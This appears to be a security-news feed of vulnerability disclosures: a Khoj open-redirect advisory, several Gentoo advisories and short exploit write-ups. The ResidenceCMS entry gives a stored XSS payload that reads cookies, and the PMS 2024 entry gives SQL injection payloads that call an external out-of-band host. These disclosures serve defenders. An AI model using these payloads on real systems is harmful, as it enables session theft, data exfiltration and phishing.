### Summary
An attacker can use the `next` parameter on the login page to redirect a victim to a malicious page, while masking this using a legit-looking `app.khoj.dev` url.
For example, `https://app.khoj.dev/login?next=//example.com` will redirect to the https://example.com page.

### Details
The problem seems to be in this method: https://github.com/khoj-ai/khoj/blob/2667ef45449eb408ce1d7c393be04845be31e15f/src/khoj/routers/auth.py#L95

### PoC
Open the `https://app.khoj.dev/login?next=//example.com` url in a Gecko-based browser (Firefox).

### Impact
The impact is low, and this could only be used in phishing attempts, but it's still a problem nonetheless.

**Package**

pip khoj-assistant (pip)

**Affected versions**

< 1.14.0

**Patched versions**

1.14.0

**Description**

**Summary**

An attacker can use the next parameter on the login page to redirect a victim to a malicious page, while masking this using a legit-looking app.khoj.dev url.  
For example, https://app.khoj.dev/login?next=//example.com will redirect to the https://example.com page.

**Details**

The problem seems to be in this method: https://github.com/khoj-ai/khoj/blob/2667ef45449eb408ce1d7c393be04845be31e15f/src/khoj/routers/auth.py#L95

**PoC**

Open the https://app.khoj.dev/login?next=//example.com url in a Gecko-based browser (Firefox).

**Impact**

The impact is low, and this could only be used in phishing attempts, but it's still a problem nonetheless.

**References**

*   GHSA-564j-v29w-rqr6
*   khoj-ai/khoj@4daf16e
*   https://github.com/khoj-ai/khoj/blob/2667ef45449eb408ce1d7c393be04845be31e15f/src/khoj/routers/auth.py#L95

 debanjum published to khoj-ai/khoj

Jul 8, 2024

Published to the GitHub Advisory Database

Jul 8, 2024

Reviewed

Jul 8, 2024

GHSA-564j-v29w-rqr6: Khoj Open Redirect Vulnerability in Login Page

Progress WhatsUp Gold WriteDatafile unauthenticated remote code execution proof of concept exploit.

Progress WhatsUp Gold WriteDatafile Unauthenticated Remote Code Execution

Progress WhatsUp Gold GetFileWithoutZip unauthenticated remote code execution proof of concept exploit.

Progress WhatsUp Gold GetFileWithoutZip Unauthenticated Remote Code Execution

Progress WhatsUp Gold SetAdminPassword local privilege escalation proof of concept exploit.

Progress WhatsUp Gold SetAdminPassword Privilege Escalation

Gentoo Linux Security Advisory 202407-21 - Multiple vulnerabilities have been discovered in the X.Org X11 library, the worst of which could lead to a denial of service. Versions greater than or equal to 1.8.7 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202407-21  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: X.Org X11 library: Multiple Vulnerabilities  
     Date: July 06, 2024  
     Bugs: #877461, #908549, #915129  
       ID: 202407-21

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in the X.Org X11 library,  
the worst of which could lead to a denial of service.

Background  
==========

X.Org is an implementation of the X Window System. The X.Org X11 library  
provides the X11 protocol library files.

Affected packages  
=================

Package          Vulnerable    Unaffected  
---------------  ------------  ------------  
x11-libs/libX11  < 1.8.7       >= 1.8.7

Description  
===========

Multiple vulnerabilities have been discovered in X.Org X11 library.  
Please review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All X.Org X11 library users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=x11-libs/libX11-1.8.7"

References  
==========

[ 1 ] CVE-2022-3554  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3554  
[ 2 ] CVE-2022-3555  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3555  
[ 3 ] CVE-2023-3138  
      https://nvd.nist.gov/vuln/detail/CVE-2023-3138  
[ 4 ] CVE-2023-43785  
      https://nvd.nist.gov/vuln/detail/CVE-2023-43785  
[ 5 ] CVE-2023-43786  
      https://nvd.nist.gov/vuln/detail/CVE-2023-43786  
[ 6 ] CVE-2023-43787  
      https://nvd.nist.gov/vuln/detail/CVE-2023-43787

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202407-21

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202407-21

ResidenceCMS versions 2.10.1 and below suffer from a persistent cross site scripting vulnerability.

    # Exploit Title: ResidenceCMS <= 2.10.1 Stored Cross-Site Scripting via Content Form# Date: 8-7-2024# Category: Web Application# Exploit Author: Jeremia Geraldi Sihombing# Version: 2.10.1# Tested on: Windows# CVE: CVE-2024-39143Description:----------------A stored cross-site scripting (XSS) vulnerability exists in ResidenceCMS 2.10.1 that allows a low-privilege user to create malicious property content with HTML inside it, which acts as a stored XSS payload. If this property page is visited by anyone including the administrator, then the XSS payload will be triggered..Steps to reproduce-------------------------1. Login as a low privilege user with property edit capability.2. Create or Edit one of the user owned property (We can user the default property owned by the user).3. Fill the content form with XSS payload using the Code View feature. Before saving it make sure to go back using the usual view to see if the HTML is rendered or not.Vulnerable parameter name: property[property_description][content]Example Payload: <img src="x" onerror="alert(document.cookie)">4. After saving the new property content and clicking the 'Finish Editing', go to the page and see the XSS is triggered. It is possible to trigger the XSS by using any account or even unauthorized account.Burp Request-------------------POST /en/user/property/7/edit HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 1111Origin: http://localhostConnection: keep-aliveReferer: http://localhost/en/user/property/7/editCookie: REMEMBERME=App.Entity.User:dXNlcg~~:1722991344:s-spusttpMsLQb2wlzMc2GJcKATcKhGTfj1VuV8GOFA~dRl86I12JAEzbjfmLzxK4ps0tMcX9WH15-DfzD115EE~; PHPSESSID=fhp06bc4sc5i8p4fk5bt9petii; sidebar-toggled=falseUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Priority: u=1property[city]=3&property[district]=&property[neighborhood]=3&property[metro_station]=&property[dealType]=1&property[category]=1&property[bathrooms_number]=&property[bedrooms_number]=2&property[max_guests]=6&property[property_description][title]=Furnished renovated 2-bedroom 2-bathroom flat&property[property_description][meta_title]=&property[property_description][meta_description]=Furnished renovated 2-bedroom 2-bathroom flat&property[address]=5411 Bayshore Blvd, Tampa, FL 33611&property[latitude]=27.885095&property[longitude]=-82.486153&property[show_map]=1&property[price]=2200&property[price_type]=mo&property[features][]=1&property[features][]=2&property[features][]=4&property[features][]=6&property[features][]=8&property[property_description][content]=<img src="x" onerror="alert(document.domain)">&files=&property[_token]=09e8a0ac823.ahexkItiSa6gSwce8RFyNpn94Uqu9g1cc4CN6g-zLsE.PSHrpu87DJzVcjJ1smI1c8-VrjjGuHUGMefsg3XWdJcuL9_F2Cc_ncMsSg

ResidenceCMS 2.10.1 Cross Site Scripting

Gentoo Linux Security Advisory 202407-20 - A vulnerability has been discovered in KDE Plasma Workspaces, which can lead to privilege escalation. Versions greater than or equal to 5.27.11.1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202407-20  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: KDE Plasma Workspaces: Privilege Escalation  
     Date: July 06, 2024  
     Bugs: #933342  
       ID: 202407-20

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in KDE Plasma Workspaces, which can  
lead to privilege escalation.

Background  
==========

KDE Plasma workspace is a widget based desktop environment designed to  
be fast and efficient.

Affected packages  
=================

Package                      Vulnerable    Unaffected  
---------------------------  ------------  ------------  
kde-plasma/plasma-workspace  < 5.27.11.1   >= 5.27.11.1

Description  
===========

Multiple vulnerabilities have been discovered in KDE Plasma Workspaces.  
Please review the CVE identifiers referenced below for details.

Impact  
======

KSmserver, KDE's XSMP manager, incorrectly allows connections via ICE  
based purely on the host, allowing all local connections. This allows  
another user on the same machine to gain access to the session  
manager.

A well crafted client could use the session restore feature to execute  
arbitrary code as the user on the next boot.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All KDE Plasma Workspaces users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=kde-plasma/plasma-workspace-5.27.11.1"

References  
==========

[ 1 ] CVE-2024-36041  
      https://nvd.nist.gov/vuln/detail/CVE-2024-36041

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202407-20

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202407-20

PMS 2024 version 1.0 suffers from a remote SQL injection vulnerability.

    ## Titles: PMS-2024 - PHP (by: oretnom23 ) v1.0 Multiple SQLi## Author: nu11secur1ty## Date: 07/06/2024## Vendor: https://github.com/oretnom23## Software:https://www.sourcecodester.com/php/15368/prison-management-system-phpoop-free-source-code.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The id parameter appears to be vulnerable to SQL injection attacks. Thepayload '+(select load_file('\\\\0z0bdh2kvtoiwpp49373y1sv7mdj1dp4sskfa3z.oastify.com\\bdk'))+' was submittedin the id parameter. This payload injects a SQL sub-query that callsMySQL's load_file function with a UNC file path that references a URL on anexternal domain. The application interacted with that domain, indicatingthat the injected SQL query was executed. The attacker can get allinformation from the system by using this vulnerability!STATUS: HIGH- Vulnerability[+]Exploits:- SQLi Multiple:```mysql---Parameter: id (POST)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY orGROUP BY clause    Payload: id=1'+(select load_file('\\\\0z0bdh2kvtoiwpp49373y1sv7mdj1dp4sskfa3z.oastify.com\\bdk'))+'' RLIKE(SELECT (CASE WHEN (4671=4671) THEN 0x31+(selectload_file(0x5c5c5c5c307a30626468326b76746f69777070343933373379317376376d646a3164703473736b6661337a2e6f6173746966792e636f6d5c5c62646b))+''ELSE 0x28 END)) AND 'apSt'='apSt    Type: error-based    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUPBY clause (EXTRACTVALUE)    Payload: id=1'+(select load_file('\\\\0z0bdh2kvtoiwpp49373y1sv7mdj1dp4sskfa3z.oastify.com\\bdk'))+'' ANDEXTRACTVALUE(4452,CONCAT(0x5c,0x71706b6271,(SELECT(ELT(4452=4452,1))),0x7171706a71)) AND 'SJhj'='SJhj    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: id=1'+(select load_file('\\\\0z0bdh2kvtoiwpp49373y1sv7mdj1dp4sskfa3z.oastify.com\\bdk'))+'' AND (SELECT6054 FROM (SELECT(SLEEP(7)))kXfT) AND 'mQNi'='mQNi---```## Reproduce:[href](https://www.patreon.com/posts/pms-php-by-v1-0-107584859)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/07/pms-php-by-oretnom23-v10-multiple-sqli.html)## Time spent:01:37:00

PMS 2024 1.0 SQL Injection

This whitepaper discusses eBPF technology in the Linux kernel and introduces the BPF Runtime Fuzzer (BRF), a fuzzer that can satisfy the semantics and dependencies required by the verifier and the eBPF subsystem.

BRF: eBPF Runtime Fuzzer

Gentoo Linux Security Advisory 202407-19 - Multiple vulnerabilities have been discovered in Mozilla Thunderbird, the worst of which could lead to remote code execution. Versions greater than or equal to 115.11.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202407-19  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Mozilla Thunderbird: Multiple Vulnerabilities  
     Date: July 06, 2024  
     Bugs: #932375  
       ID: 202407-19

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Mozilla Thunderbird,  
the worst of which could lead to remote code execution.

Background  
==========

Mozilla Thunderbird is a popular open-source email client from the  
Mozilla project.

Affected packages  
=================

Package                      Vulnerable    Unaffected  
---------------------------  ------------  ------------  
mail-client/thunderbird      < 115.11.0    >= 115.11.0  
mail-client/thunderbird-bin  < 115.11.0    >= 115.11.0

Description  
===========

Multiple vulnerabilities have been discovered in Mozilla Thunderbird.  
Please review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Mozilla Thunderbird binary users should upgrade to the latest  
version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=mail-client/thunderbird-bin-115.11.0"

All Mozilla Thunderbird users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=mail-client/thunderbird-115.11.0"

References  
==========

[ 1 ] CVE-2024-2609  
      https://nvd.nist.gov/vuln/detail/CVE-2024-2609  
[ 2 ] CVE-2024-3302  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3302  
[ 3 ] CVE-2024-3854  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3854  
[ 4 ] CVE-2024-3857  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3857  
[ 5 ] CVE-2024-3859  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3859  
[ 6 ] CVE-2024-3861  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3861  
[ 7 ] CVE-2024-3864  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3864

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202407-19

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Latest News